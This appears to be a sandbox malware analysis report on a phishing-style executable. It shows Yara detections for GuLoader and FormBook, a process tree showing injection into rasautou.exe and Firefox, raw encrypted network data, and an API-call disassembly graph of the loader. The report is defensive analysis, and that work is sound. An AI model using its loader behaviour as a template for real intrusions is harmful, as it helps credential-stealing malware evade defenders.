                                                                                    2024-03-18 14:06:52 UTC4680INData Raw: f3 d0 78 89 39 59 d4 ea c1 1e bc 6b 5d d3 f4 cb ab 77 65 d0 4f 63 fe d0 a0 68 6e 74 ce 3b 2c 6d 7a 20 84 5a 78 4a 16 3e ed 48 14 8c de ae da 00 ae ef fd 8f ba 32 52 62 7f 90 81 ce e5 58 3a 2f 19 6e e8 7f 64 c5 20 16 33 47 cf 4e 73 9e 6f a1 b0 cf 58 c3 48 17 e3 cb 01 24 16 99 68 0a ba d9 72 cb 0a 85 23 0a 7a c9 38 1c 68 34 2b 36 ea 03 92 ac a4 b9 51 6c 42 7b 73 82 09 5d 76 0d 36 dd 3a e0 0d e9 ab d4 a7 0b e6 fe 5a 5e 31 11 98 df fe 27 f4 ce de 6f 17 03 95 05 9c 1c f3 53 bc d9 96 81 a0 a4 07 17 14 45 9b a3 9b 14 96 b0 36 d6 fc e3 8a 57 bd d6 87 41 c1 70 c9 7b 78 5c f0 0f 42 9b 5a 82 d1 f7 5d e7 ee 10 6b 61 a8 01 17 76 27 96 17 1e 30 14 76 72 95 a5 cf d5 d6 cf 19 ee 97 fc 8d c9 4b a3 1e b7 81 8e 55 cd fb 88 c5 10 c3 67 a3 c1 ac 7f d2 a2 8c 2c d1 9f 57 53 22
                                                                                    Data Ascii: x9Yk]weOchnt;,mz ZxJ>H2RbX:/nd 3GNsoXH$hr#z8h4+6QlB{s]v6:Z^1'oSE6WAp{x\BZ]kav'0vrKUg,WS"
                                                                                    2024-03-18 14:06:52 UTC4680INData Raw: e6 0f a3 6b 6c eb 63 97 8f 78 ca 2e 9e 6c 3d 3f d8 bc 24 fe fb e8 10 72 35 b1 06 f3 bf c8 f7 e8 4a 81 c0 0f 1d 8e cc 9c b3 b0 fd 4c 59 bc 76 64 47 d6 38 c5 51 d4 7b 4d 61 34 47 5c eb 3f 3c 24 f1 9c 96 de fe c4 87 fd 75 ff a5 7e d2 72 64 2a 5d ca c2 0b 47 29 b4 b1 15 8e f0 31 f9 2e d2 65 38 b9 e2 fe 06 a4 c4 a6 27 31 e1 3e ea c6 71 86 17 bf 23 5b e3 3a 9e 27 e0 7b 7f 5e 33 8e 81 61 61 87 36 58 45 a7 9b f7 26 d2 4d 80 b5 1e 7d 95 f1 62 f2 7e aa ba 60 c8 c4 f6 6b 19 a9 cb 66 7d c5 2a bb cf f3 96 5e 4b 76 43 65 d0 6c c3 db 7a 9d 15 19 7b 8a 20 28 42 b0 e3 72 51 1d b3 7b c8 d7 2c e1 ae 2f 2c 25 11 fa 36 6c 0a db 5e 94 de 3e 41 fa 3c 24 ed 97 20 e2 d0 68 ae 3f cf b8 0b f3 24 2a 7c 11 3b f8 f3 72 6f c3 5e 21 6b 59 94 9c 61 90 f6 52 66 0e a8 32 06 23 97 52 38 82
                                                                                    Data Ascii: klcx.l=?$r5JLYvdG8Q{Ma4G\?<$u~rd*]G)1.e8'1>q#[:'{^3aa6XE&M}b~`kf}*^KvCelz{ (BrQ{,/,%6l^>A<$ h?$*|;ro^!kYaRf2#R8
                                                                                    2024-03-18 14:06:52 UTC1981INData Raw: 47 43 74 5a 53 73 55 98 98 4e 4a 5a bc f9 35 1b ef d6 69 1b d8 c4 80 f8 c0 fa 26 21 b2 cc 6c 5f 6f 85 b2 ed 64 69 a2 b1 35 a0 55 fb 42 ba 0d ce 56 15 57 7b 51 74 0f 3a ef 8b 06 10 94 d6 36 0b 4f d9 d6 38 74 a0 0b 22 7b 68 4a 17 fc 29 92 61 3b 91 47 65 81 b3 90 e0 25 a0 57 b6 c4 1b 4d 1b e9 dd d6 5e a5 48 41 fb 6a 6c c9 59 98 07 2c 75 34 83 c7 af 8e b5 fb b0 49 8b 2a 4f e5 d5 a0 b0 1e 33 75 4c 96 5c 69 fa dd c4 38 7f 53 c3 10 90 5e bc f0 79 17 a8 b0 1b 5f 9c 43 d5 fa 9f 80 50 0a 8d 21 e5 6e 15 38 0a e6 34 61 22 3e 13 b1 98 5e 41 b1 0d 45 78 be 43 40 4d 4b 7c 9e ca c2 4e b3 7f 28 42 71 a1 b8 81 4f 18 6b 16 10 1c 5c d8 df f5 ce 2f b4 ef 73 a4 5c 46 1a 93 13 62 00 12 8d 08 75 9a 57 96 52 75 20 b3 4f ad e1 f4 03 f7 8e 44 50 25 a2 34 39 26 1d 69 4d 01 7a 24 be
                                                                                    Data Ascii: GCtZSsUNJZ5i&!l_odi5UBVW{Qt:6O8t"{hJ)a;Ge%WM^HAjlY,u4I*O3uL\i8S^y_CP!n84a">^AExC@MK|N(BqOk\/s\FbuWRu ODP%49&iMz$
                                                                                    2024-03-18 14:06:52 UTC1252INData Raw: 9b 67 18 03 2c d9 0a 7e 68 42 36 4b bf d6 9f 96 f3 27 8b cd 0c 3d d4 f8 14 4c 00 26 78 b9 b7 46 61 71 c5 9e 35 97 a5 66 33 3f 98 0e 1b da 89 29 7c ad 22 ee 81 f4 a4 db 70 0c 65 d1 0f ff d0 88 ac 19 af 55 b8 ad bf 0e 60 30 92 9f 6b aa de 35 0c bf e1 00 7e 6f c4 7d a2 66 a1 69 b1 a0 ce bf 8c ff 4a fd b5 78 14 c2 54 10 19 c3 36 1b d4 76 93 4d 38 09 99 be 05 80 01 d0 22 5a d9 91 d4 84 c8 06 28 cd 79 a1 58 0a b4 66 7f 1e 1b a3 67 dd 6c 79 85 fa 84 a8 9d cf 5f fd 17 f5 fe 3f 97 2f 35 44 b4 c0 dc a0 e0 53 ef cd 74 bd 19 86 15 e4 dd f2 f1 95 3c 17 58 79 c8 82 61 8e f9 50 03 4c 9c d1 4e c7 74 07 4f b0 ac f5 e4 ae 5f 92 bb 9a ba 05 df e9 84 7d 8c 3e fe a0 39 68 5e be 4e a9 c6 3f 6a 90 d7 4f 2d c7 60 34 08 00 db 31 0d 58 26 37 28 c9 46 3e fb f5 04 12 16 29 68 a0 54
                                                                                    Data Ascii: g,~hB6K'=L&xFaq5f3?)|"peU`0k5~o}fiJxT6vM8"Z(yXfgly_?/5DSt<XyaPLNtO_}>9h^N?jO-`41X&7(F>)hT
                                                                                    2024-03-18 14:06:52 UTC1252INData Raw: 64 17 1e e4 ab 60 2d 02 cb cd be 4f 3f fc 00 e2 1c b8 5f f3 a4 33 b0 49 f5 1c b7 f2 f6 19 d2 f6 62 9d ca c1 52 9c 21 7b 44 bf f9 65 3a 91 91 09 6e 0f 2a 3e ce 18 fa e3 f1 73 9a 84 2d ea e7 5a b0 76 d8 6f e4 a4 fa 72 ea 71 78 99 18 28 70 c5 5b b3 83 ac 0a 01 e9 0c 8b 46 67 26 ea af 2e e2 f8 56 77 d2 40 37 86 bb 50 23 3a f8 05 24 6e b6 48 8b c9 c1 53 0a da 4a 1f 91 2e 60 98 96 2b c7 02 e4 8c f0 ad 40 b1 96 3c 69 4d bd 37 5d 96 7b 45 93 29 c3 17 c0 89 8a 7d b0 41 b1 b3 7b d0 15 b5 2c f2 35 d3 a6 a2 a4 5f 08 95 46 b1 f2 83 de 30 72 93 e6 2f c0 67 c4 83 0b 6c f8 05 6f 5b 5b 34 5e fe d0 88 88 3c da 1b 02 ec 51 0f 9b 99 ce 14 69 0a c1 4f 66 af 88 69 95 1f 69 0d 6e 97 a6 e2 5d a6 18 af 09 36 3e 5a 8b c2 92 fe ca 3f d9 38 33 91 78 3c 8d 05 b0 8e e4 92 55 13 f4 7b
                                                                                    Data Ascii: d`-O?_3IbR!{De:n*>s-Zvorqx(p[Fg&.Vw@7P#:$nHSJ.`+@<iM7]{E)}A{,5_F0r/glo[[4^<QiOfiin]6>Z?83x<U{
                                                                                    2024-03-18 14:06:52 UTC1252INData Raw: 03 63 96 91 4a 33 20 e7 80 c9 5a 04 8e 95 62 39 c1 b3 96 56 98 31 32 83 6a 05 7a e6 d8 41 1e 67 30 54 52 23 04 84 77 a9 a5 0f c8 1c 14 73 2a a5 9f c7 ff 2c 0c 9e 86 2a 2b ed 77 34 88 c2 c6 92 a0 24 75 c2 45 df 87 7b ff 87 bc ab 3b e9 a6 84 d6 5d 25 ed 15 0c 23 01 45 d0 0b 0a c4 32 11 73 0e 9b 08 8a a0 a7 51 6d 03 51 a5 46 1d 7b f9 c4 79 38 19 86 24 bd 00 47 eb c3 32 3e 00 4a 54 7f c3 c5 37 8a 44 c7 35 82 e9 9f 25 78 eb 11 0e 67 e9 e8 e8 c1 88 88 c0 86 41 ae a4 4d 8b 57 12 98 9b 8c 3b 2a 60 cd 47 de d0 99 1c 17 cf a3 df f7 98 3c be fc 44 2a a8 a0 aa 8f ba 1c 9b b3 ce f5 a9 fe ed 28 09 72 93 ec 53 47 2a 31 f4 af d8 85 94 03 26 0f 99 83 c8 81 ff 1a d0 7b 36 b8 7b f7 55 eb e1 13 d7 3b 76 50 d5 5b b5 34 2f b8 07 9d 36 7a 15 f0 97 b8 d3 92 22 44 1e 26 75 8c 4d
                                                                                    Data Ascii: cJ3 Zb9V12jzAg0TR#ws*,*+w4$uE{;]%#E2sQmQF{y8$G2>JT7D5%xgAMW;*`G<D*(rSG*1&{6{U;vP[4/6z"D&uM
                                                                                    2024-03-18 14:06:52 UTC1252INData Raw: 36 e3 fe fb 4e 53 66 66 cb 70 31 64 0a 6b cf 12 bb a6 83 26 a2 07 56 98 fb bf 35 c5 5a d0 c7 b2 6c d8 1c 3b 12 e3 36 40 c1 03 7a 1d fd fb da 06 93 98 82 ed 82 39 73 76 eb 25 93 ae e6 3e 85 27 76 a8 83 45 42 6a 03 5c 6d 67 15 90 6c 27 73 54 eb 82 91 f7 29 fd 6d 89 80 27 d7 af dd 6d 3d 86 c1 62 f1 ac 4e d7 2f 55 9d 63 a7 1f f5 39 63 a3 bb 4f 59 a4 8a fd ab 95 f3 94 83 bd f2 28 14 60 60 12 7a 82 cf 9f fd 7c 89 43 d5 8f 9d ee 4d ea bd 56 54 a0 64 f9 ce f8 01 a5 d5 f3 c3 dc 14 81 af 1c 44 50 59 ed 2c a8 7a 70 54 10 42 79 2d d7 a9 b7 01 e6 a8 67 9c ed 45 66 af 97 4d 8a da 6d 1a 67 8a 92 e8 e7 6d 49 f9 84 bf b8 6d d0 e4 b8 61 bd f2 0e 7e b3 c4 5c 35 1b 49 b3 5e 7c 55 e9 67 75 e8 61 ed 6c bd a9 5b 79 75 a2 c5 42 1d e5 5d 0c 1e 74 d8 7f 10 3e e7 d2 d5 a6 c4 46 f9
                                                                                    Data Ascii: 6NSffp1dk&V5Zl;6@z9sv%>'vEBj\mgl'sT)m'm=bN/Uc9cOY(``z|CMVTdDPY,zpTBy-gEfMmgmIma~\5I^|Ugual[yuB]t>F
                                                                                    2024-03-18 14:06:52 UTC1252INData Raw: 39 37 1d 7f 1f ce 66 46 26 99 d3 d8 76 b5 65 28 01 ac 1f b4 27 dc 64 91 1d 88 cf f7 45 cb d2 93 aa e9 dc 6f df 60 4e 6c 16 0a 54 3b d5 a5 14 04 f4 2e 62 0f 12 31 d7 5f fa b7 4d b1 92 50 91 3a 16 f7 c8 0d f8 0e ac d1 e2 46 49 bb b1 b9 99 7f 76 ab 23 9c 1c 01 63 25 3b 78 44 f6 a9 ab 6c ce 94 6b 28 6f fe e3 2b 91 ef e5 0f 2e bd c3 ca 4e 89 30 71 aa 32 3a 75 2e 70 66 de cc fe 22 a2 d8 a9 fc 08 e7 13 6d 05 75 44 2c 37 30 28 a1 d0 ad 32 ee d6 fe 34 7e 2f 8b fe 5f df a9 22 28 49 21 52 7f 76 06 3e be ec ce 12 8b c5 68 ef aa 01 86 bb 05 e5 65 9b 8f 71 90 eb be 87 95 9a 95 59 e7 8a 08 b4 ca de 27 bc 6a 66 bc 94 2b e4 7a 41 57 22 3c cd 60 0d 38 bc 79 d0 75 6c fb fb 4c e4 51 13 11 54 7c 28 2a 5c 50 47 25 33 4d a2 af 30 36 9b d3 00 99 e9 ba fa 8e 97 a7 28 14 20 aa ca
                                                                                    Data Ascii: 97fF&ve('dEo`NlT;.b1_MP:FIv#c%;xDlk(o+.N0q2:u.pf"muD,70(24~/_"(I!Rv>heqY'jf+zAW"<`8yulLQT|(*\PG%3M06(
                                                                                    2024-03-18 14:06:52 UTC1252INData Raw: 8a 30 c5 a2 3b 52 5d 36 f5 45 8c f6 12 9e d4 22 7c 03 40 a6 e0 ee c8 24 d4 ad 21 03 ab 4d 3d 55 29 50 53 32 f8 e3 28 b5 06 92 75 92 88 f5 75 3a 6e be a3 a0 7c 03 db f1 2d 79 64 fc 52 88 f1 6c a6 a5 38 07 25 7b b6 2d 0b bc 29 b4 88 8c 49 dc 39 ec 88 6e fc aa 10 f3 c9 b3 e0 d7 84 33 4a d2 e8 d2 db 09 fa 70 a0 8e 76 e1 17 07 3a c4 8a 5c 40 d8 73 06 09 d4 80 76 94 a6 45 71 f9 e0 54 53 3b 42 ed 0a bb 37 e6 46 ba 85 d4 ea 45 40 b0 cf 0c 81 a7 22 0b a6 22 ab 97 9e 8b 73 d1 6f 68 77 b2 e5 97 ef d3 5f f5 1b f8 cf 82 65 ec 44 6c 79 a3 d2 b6 b3 77 aa 94 97 1f 51 7b a2 e4 d2 da e5 ae aa e3 a0 a4 b9 42 44 b6 4e be 5c b6 99 59 fd 60 5a d4 3d 12 b6 0a c9 d7 9b 6d d6 88 69 7e d8 8f 17 23 9b dc f4 4f e3 08 6f d2 9c 6e 05 32 c0 a5 f8 b8 30 7d 0c 33 47 91 e6 7e 9e a2 6e ff
                                                                                    Data Ascii: 0;R]6E"|@$!M=U)PS2(uu:n|-ydRl8%{-)I9n3Jpv:\@svEqTS;B7FE@""sohw_eDlywQ{BDN\Y`Z=mi~#Oon20}3G~n
                                                                                    2024-03-18 14:06:52 UTC1252INData Raw: e7 0b 44 87 bd dd 96 b8 59 09 69 1d 2e 07 99 92 13 83 f1 50 39 9c 19 ac 57 91 ca 59 c8 aa 80 a6 75 47 03 47 6a 63 99 ea 51 78 ea 0a 17 dc 2c 85 8d 99 31 44 da 20 93 9d cb 78 34 cc 16 f2 7b ff a8 36 ea 43 3c 74 1e 00 1a 86 ab 8a 18 b7 d5 eb a6 8f ec 11 90 78 4b 30 43 fc ab f4 7c 03 7e 9a 29 9c aa fa fc 76 b4 cb 0f 7f 8c 88 bc 77 c3 71 01 f9 ff 67 52 c1 84 2b 1d dd 2c 5d 1f 83 51 56 8e de c1 f5 92 80 bf a8 79 7c ca 0e f1 a3 e5 09 ca f7 43 45 a2 38 77 94 e4 b2 6b f2 49 22 b8 ca 63 c4 7a 8f db 4b 9d aa f8 50 71 5e 4d 69 95 c9 d5 4b f8 f2 b0 75 cb 9f 46 0e 4e 3c 7e 99 2b 33 18 7b ae a3 3d 14 01 49 90 10 44 52 64 26 c1 87 86 a6 89 9f e2 33 5c 0c ab 0a 99 7a 9d 87 a0 02 9d e7 e2 f7 06 8e 55 55 af d5 da df ba 11 aa ea 40 9a c2 6a 1f 4e ee a9 14 46 0d 5b 95 10 6d
                                                                                    Data Ascii: DYi.P9WYuGGjcQx,1D x4{6C<txK0C|~)vwqgR+,]QVy|CE8wkI"czKPq^MiKuFN<~+3{=IDRd&3\zUU@jNF[m


                                                                                    Statistics

                                                                                    CPU Usage

                                                                                    Click to jump to process

                                                                                    Memory Usage

                                                                                    Click to jump to process

                                                                                    Behavior

                                                                                    Click to jump to process

                                                                                    System Behavior

                                                                                    General

                                                                                    Target ID:0
                                                                                    Start time:15:06:11
                                                                                    Start date:18/03/2024
                                                                                    Path:C:\Users\user\Desktop\cuenta para pago1.exe
                                                                                    Wow64 process (32bit):true
                                                                                    Commandline:C:\Users\user\Desktop\cuenta para pago1.exe
                                                                                    Imagebase:0x400000
                                                                                    File size:826'296 bytes
                                                                                    MD5 hash:93D1942C204022E792AF256D0CCBE8E5
                                                                                    Has elevated privileges:true
                                                                                    Has administrator privileges:true
                                                                                    Programmed in:C, C++ or other language
                                                                                    Yara matches:
                                                                                    • Rule: JoeSecurity_GuLoader_2, Description: Yara detected GuLoader, Source: 00000000.00000002.4059690339.0000000004F84000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                    Reputation:low
                                                                                    Has exited:true

                                                                                    General

                                                                                    Target ID:2
                                                                                    Start time:15:06:41
                                                                                    Start date:18/03/2024
                                                                                    Path:C:\Users\user\Desktop\cuenta para pago1.exe
                                                                                    Wow64 process (32bit):true
                                                                                    Commandline:C:\Users\user\Desktop\cuenta para pago1.exe
                                                                                    Imagebase:0x400000
                                                                                    File size:826'296 bytes
                                                                                    MD5 hash:93D1942C204022E792AF256D0CCBE8E5
                                                                                    Has elevated privileges:true
                                                                                    Has administrator privileges:true
                                                                                    Programmed in:C, C++ or other language
                                                                                    Yara matches:
                                                                                    • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000002.00000002.4215364100.0000000034570000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                    • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000002.00000002.4215364100.0000000034570000.00000040.10000000.00040000.00000000.sdmp, Author: unknown
                                                                                    • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000002.00000002.4216278898.0000000034BE0000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                    • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000002.00000002.4216278898.0000000034BE0000.00000040.10000000.00040000.00000000.sdmp, Author: unknown
                                                                                    • Rule: JoeSecurity_GuLoader_2, Description: Yara detected GuLoader, Source: 00000002.00000002.4188957643.0000000001794000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                                    Reputation:low
                                                                                    Has exited:true

                                                                                    General

                                                                                    Target ID:3
                                                                                    Start time:15:06:57
                                                                                    Start date:18/03/2024
                                                                                    Path:C:\Program Files (x86)\xWRDBjNurNxAHXPmPUzJfASReCWRqOHlLKYYBZzCUvQGolgpFHtbZtyYBPNPuKZHFpMIT\YRrrNrIQCTKNXVoSiuJzTSdqxJTSo.exe
                                                                                    Wow64 process (32bit):true
                                                                                    Commandline:"C:\Program Files (x86)\xWRDBjNurNxAHXPmPUzJfASReCWRqOHlLKYYBZzCUvQGolgpFHtbZtyYBPNPuKZHFpMIT\YRrrNrIQCTKNXVoSiuJzTSdqxJTSo.exe"
                                                                                    Imagebase:0xe00000
                                                                                    File size:140'800 bytes
                                                                                    MD5 hash:32B8AD6ECA9094891E792631BAEA9717
                                                                                    Has elevated privileges:false
                                                                                    Has administrator privileges:false
                                                                                    Programmed in:C, C++ or other language
                                                                                    Yara matches:
                                                                                    • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000003.00000002.8751957709.00000000026D0000.00000040.00000001.00040000.00000000.sdmp, Author: Joe Security
                                                                                    • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000003.00000002.8751957709.00000000026D0000.00000040.00000001.00040000.00000000.sdmp, Author: unknown
                                                                                    Reputation:high
                                                                                    Has exited:false

                                                                                    General

                                                                                    Target ID:4
                                                                                    Start time:15:06:58
                                                                                    Start date:18/03/2024
                                                                                    Path:C:\Windows\SysWOW64\rasautou.exe
                                                                                    Wow64 process (32bit):true
                                                                                    Commandline:C:\Windows\SysWOW64\rasautou.exe
                                                                                    Imagebase:0xac0000
                                                                                    File size:15'360 bytes
                                                                                    MD5 hash:DFDBEDC2ED47CBABC13CCC64E97868F3
                                                                                    Has elevated privileges:false
                                                                                    Has administrator privileges:false
                                                                                    Programmed in:C, C++ or other language
                                                                                    Yara matches:
                                                                                    • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000004.00000002.8749789268.0000000002DA0000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                    • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000004.00000002.8749789268.0000000002DA0000.00000040.80000000.00040000.00000000.sdmp, Author: unknown
                                                                                    • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000004.00000002.8752868489.0000000004E10000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                    • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000004.00000002.8752868489.0000000004E10000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                                                                                    • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000004.00000002.8752999026.0000000004E50000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                    • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000004.00000002.8752999026.0000000004E50000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                                                                                    Reputation:moderate
                                                                                    Has exited:false

                                                                                    General

                                                                                    Target ID:5
                                                                                    Start time:15:07:11
                                                                                    Start date:18/03/2024
                                                                                    Path:C:\Program Files (x86)\xWRDBjNurNxAHXPmPUzJfASReCWRqOHlLKYYBZzCUvQGolgpFHtbZtyYBPNPuKZHFpMIT\YRrrNrIQCTKNXVoSiuJzTSdqxJTSo.exe
                                                                                    Wow64 process (32bit):true
                                                                                    Commandline:"C:\Program Files (x86)\xWRDBjNurNxAHXPmPUzJfASReCWRqOHlLKYYBZzCUvQGolgpFHtbZtyYBPNPuKZHFpMIT\YRrrNrIQCTKNXVoSiuJzTSdqxJTSo.exe"
                                                                                    Imagebase:0xe00000
                                                                                    File size:140'800 bytes
                                                                                    MD5 hash:32B8AD6ECA9094891E792631BAEA9717
                                                                                    Has elevated privileges:false
                                                                                    Has administrator privileges:false
                                                                                    Programmed in:C, C++ or other language
                                                                                    Yara matches:
                                                                                    • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000005.00000002.8751671842.00000000015C0000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                    • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000005.00000002.8751671842.00000000015C0000.00000040.80000000.00040000.00000000.sdmp, Author: unknown
                                                                                    Reputation:high
                                                                                    Has exited:false

                                                                                    General

                                                                                    Target ID:6
                                                                                    Start time:15:08:38
                                                                                    Start date:18/03/2024
                                                                                    Path:C:\Program Files\Mozilla Firefox\firefox.exe
                                                                                    Wow64 process (32bit):false
                                                                                    Commandline:C:\Program Files\Mozilla Firefox\Firefox.exe
                                                                                    Imagebase:0x7ff7a9000000
                                                                                    File size:687'008 bytes
                                                                                    MD5 hash:D1CC73370B9EF7D74E6D9FD9248CD687
                                                                                    Has elevated privileges:false
                                                                                    Has administrator privileges:false
                                                                                    Programmed in:C, C++ or other language
                                                                                    Reputation:moderate
                                                                                    Has exited:true

                                                                                    Disassembly

                                                                                    Reset < >

                                                                                      Execution Graph

                                                                                      Execution Coverage:21.2%
                                                                                      Dynamic/Decrypted Code Coverage:13.7%
                                                                                      Signature Coverage:20%
                                                                                      Total number of Nodes:1542
                                                                                      Total number of Limit Nodes:45
                                                                                      execution_graph 5116 402840 5117 402bbf 18 API calls 5116->5117 5119 40284e 5117->5119 5118 402864 5121 405bca 2 API calls 5118->5121 5119->5118 5120 402bbf 18 API calls 5119->5120 5120->5118 5122 40286a 5121->5122 5144 405bef GetFileAttributesW CreateFileW 5122->5144 5124 402877 5125 402883 GlobalAlloc 5124->5125 5126 40291a 5124->5126 5129 402911 CloseHandle 5125->5129 5130 40289c 5125->5130 5127 402922 DeleteFileW 5126->5127 5128 402935 5126->5128 5127->5128 5129->5126 5145 403222 SetFilePointer 5130->5145 5132 4028a2 5133 40320c ReadFile 5132->5133 5134 4028ab GlobalAlloc 5133->5134 5135 4028bb 5134->5135 5136 4028ef 5134->5136 5137 403027 36 API calls 5135->5137 5138 405ca1 WriteFile 5136->5138 5139 4028c8 5137->5139 5140 4028fb GlobalFree 5138->5140 5142 4028e6 GlobalFree 5139->5142 5141 403027 36 API calls 5140->5141 5143 40290e 5141->5143 5142->5136 5143->5129 5144->5124 5145->5132 5146 10001000 5149 1000101b 5146->5149 5156 10001516 5149->5156 5151 10001020 5152 10001024 5151->5152 5153 10001027 GlobalAlloc 5151->5153 5154 1000153d 3 API calls 5152->5154 5153->5152 5155 10001019 5154->5155 5158 1000151c 5156->5158 5157 10001522 5157->5151 5158->5157 5159 1000152e GlobalFree 5158->5159 5159->5151 5160 401cc0 5161 402ba2 18 API calls 5160->5161 5162 401cc7 5161->5162 5163 402ba2 18 API calls 5162->5163 5164 401ccf GetDlgItem 5163->5164 5165 402531 5164->5165 5166 4029c0 5167 402ba2 18 API calls 5166->5167 5168 4029c6 5167->5168 5169 4029d4 5168->5169 5170 4029f9 5168->5170 5172 40281e 5168->5172 5169->5172 5174 405f61 wsprintfW 5169->5174 5171 40603c 18 API calls 5170->5171 5170->5172 5171->5172 5174->5172 4003 401fc3 4004 401fd5 4003->4004 4005 402087 4003->4005 4026 402bbf 4004->4026 4007 401423 25 API calls 4005->4007 4014 4021e1 4007->4014 4009 402bbf 18 API calls 4010 401fe5 4009->4010 4011 401ffb LoadLibraryExW 4010->4011 4012 401fed GetModuleHandleW 4010->4012 4011->4005 4013 40200c 4011->4013 4012->4011 4012->4013 4032 406463 WideCharToMultiByte 4013->4032 4017 402056 4080 405179 4017->4080 4018 40201d 4019 402025 4018->4019 4020 40203c 4018->4020 4077 401423 4019->4077 4035 10001759 4020->4035 4023 40202d 4023->4014 4024 402079 FreeLibrary 4023->4024 4024->4014 4027 402bcb 4026->4027 4091 40603c 4027->4091 4030 401fdc 4030->4009 4033 40648d GetProcAddress 4032->4033 4034 402017 4032->4034 4033->4034 4034->4017 4034->4018 4036 10001789 4035->4036 4130 10001b18 4036->4130 4038 10001790 4039 100018a6 4038->4039 4040 100017a1 4038->4040 4041 100017a8 4038->4041 4039->4023 4179 10002286 4040->4179 4162 100022d0 4041->4162 4046 1000180c 4050 10001812 4046->4050 4051 1000184e 4046->4051 4047 100017ee 4192 100024a9 4047->4192 4048 100017d7 4060 100017cd 4048->4060 4189 10002b5f 4048->4189 4049 100017be 4053 100017c4 4049->4053 4058 100017cf 4049->4058 4054 100015b4 3 API calls 4050->4054 4056 100024a9 10 API calls 4051->4056 4053->4060 4173 100028a4 4053->4173 4062 10001828 4054->4062 4067 10001840 4056->4067 4057 100017f4 4203 100015b4 4057->4203 4183 10002645 4058->4183 4060->4046 4060->4047 4065 100024a9 10 API calls 4062->4065 4064 100017d5 4064->4060 4065->4067 4068 10001895 4067->4068 4214 1000246c 4067->4214 4068->4039 4071 1000189f GlobalFree 4068->4071 4071->4039 4074 10001881 4074->4068 4218 1000153d wsprintfW 4074->4218 4075 1000187a FreeLibrary 4075->4074 4078 405179 25 API calls 4077->4078 4079 401431 4078->4079 4079->4023 4081 405194 4080->4081 4090 405236 4080->4090 4082 4051b0 lstrlenW 4081->4082 4083 40603c 18 API calls 4081->4083 4084 4051d9 4082->4084 4085 4051be lstrlenW 4082->4085 4083->4082 4087 4051ec 4084->4087 4088 4051df SetWindowTextW 4084->4088 4086 4051d0 lstrcatW 4085->4086 4085->4090 4086->4084 4089 4051f2 SendMessageW SendMessageW SendMessageW 4087->4089 4087->4090 4088->4087 4089->4090 4090->4023 4092 406049 4091->4092 4093 406294 4092->4093 4096 4060fc GetVersion 4092->4096 4097 406262 lstrlenW 4092->4097 4099 40603c 10 API calls 4092->4099 4102 406177 GetSystemDirectoryW 4092->4102 4103 40618a GetWindowsDirectoryW 4092->4103 4104 4062ae 5 API calls 4092->4104 4105 40603c 10 API calls 4092->4105 4106 406203 lstrcatW 4092->4106 4107 4061be SHGetSpecialFolderLocation 4092->4107 4118 405ee7 RegOpenKeyExW 4092->4118 4123 405f61 wsprintfW 4092->4123 4124 40601a lstrcpynW 4092->4124 4094 402bec 4093->4094 4125 40601a lstrcpynW 4093->4125 4094->4030 4109 4062ae 4094->4109 4096->4092 4097->4092 4099->4097 4102->4092 4103->4092 4104->4092 4105->4092 4106->4092 4107->4092 4108 4061d6 SHGetPathFromIDListW CoTaskMemFree 4107->4108 4108->4092 4116 4062bb 4109->4116 4110 406331 4111 406336 CharPrevW 4110->4111 4114 406357 4110->4114 4111->4110 4112 406324 CharNextW 4112->4110 4112->4116 4114->4030 4115 406310 CharNextW 4115->4116 4116->4110 4116->4112 4116->4115 4117 40631f CharNextW 4116->4117 4126 4059fb 4116->4126 4117->4112 4119 405f5b 4118->4119 4120 405f1b RegQueryValueExW 4118->4120 4119->4092 4121 405f3c RegCloseKey 4120->4121 4121->4119 4123->4092 4124->4092 4125->4094 4127 405a01 4126->4127 4128 405a17 4127->4128 4129 405a08 CharNextW 4127->4129 4128->4116 4129->4127 4221 1000121b GlobalAlloc 4130->4221 4132 10001b3c 4222 1000121b GlobalAlloc 4132->4222 4134 10001d7a GlobalFree GlobalFree GlobalFree 4135 10001d97 4134->4135 4153 10001de1 4134->4153 4136 100020ee 4135->4136 4144 10001dac 4135->4144 4135->4153 4138 10002110 GetModuleHandleW 4136->4138 4136->4153 4137 10001c1d GlobalAlloc 4158 10001b47 4137->4158 4139 10002121 LoadLibraryW 4138->4139 4140 10002136 4138->4140 4139->4140 4139->4153 4229 100015ff WideCharToMultiByte GlobalAlloc WideCharToMultiByte GetProcAddress GlobalFree 4140->4229 4141 10001c68 lstrcpyW 4145 10001c72 lstrcpyW 4141->4145 4142 10001c86 GlobalFree 4142->4158 4144->4153 4225 1000122c 4144->4225 4145->4158 4146 10002188 4147 10002195 lstrlenW 4146->4147 4146->4153 4230 100015ff WideCharToMultiByte GlobalAlloc WideCharToMultiByte GetProcAddress GlobalFree 4147->4230 4149 10002148 4149->4146 4161 10002172 GetProcAddress 4149->4161 4150 10002048 4150->4153 4154 10002090 lstrcpyW 4150->4154 4153->4038 4154->4153 4155 10001cc4 4155->4158 4223 1000158f GlobalSize GlobalAlloc 4155->4223 4156 10001f37 GlobalFree 4156->4158 